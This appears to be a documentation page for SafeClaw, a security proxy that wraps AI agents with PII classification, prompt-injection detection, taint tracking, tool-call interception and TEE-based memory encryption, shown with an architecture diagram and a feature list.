A3S SafeClaw
A3S SafeClaw
Security proxy for AI agents with PII classification, taint tracking, and confidential computing
A3S SafeClaw
SafeClaw is a security proxy for AI agents that runs inside an A3S Box VM. It classifies messages for PII, detects prompt injection attacks, sanitizes outputs, tracks data taint, and audits everything — with optional hardware-level memory encryption via TEE.
Architecture
User Input
↓
┌─────────────────────────────────────────────────────┐
│ ZONE 1: Untrusted (Gateway) │
│ Privacy Classifier (detect PII) │
│ Injection Detector (block prompt injection) │
│ Route decision: Local or TEE? │
└──────────────────┬──────────────────────────────────┘
│ Encrypted Channel (AES-256-GCM)
┌──────────────────▼──────────────────────────────────┐
│ ZONE 2: Trusted (TEE - Hardware Isolated) │
│ Decrypt message │
│ Process with AI agent (a3s-code) │
│ Output Sanitizer (redact tainted data) │
│ Tool Interceptor (block dangerous commands) │
└──────────────────┬──────────────────────────────────┘
↓
Safe Output (PII redacted, audit logged)Defense in Depth
Prop
Type
Core Components
Prop
Type
Key Statistics
Prop
Type
Key Features
- Multi-level PII classification with regex, semantic, and compliance backends
- Taint tracking with variant detection (base64, hex, URL-encoded, reversed)
- Prompt injection detection with 5 attack categories
- Tool call interception blocking dangerous commands
- Whitelist-only network firewall with domain and protocol rules
- Per-session isolation with secure memory erasure
- 7 channel adapters: Telegram, Slack, Discord, Feishu, DingTalk, WeCom, WebChat
- Three-layer memory: Resources → Artifacts → Insights with privacy gates
- TEE integration: AMD SEV-SNP, Intel SGX, ARM CCA support
- Compliance engine: HIPAA, PCI-DSS, GDPR rule sets
- Cumulative risk tracking across conversation turns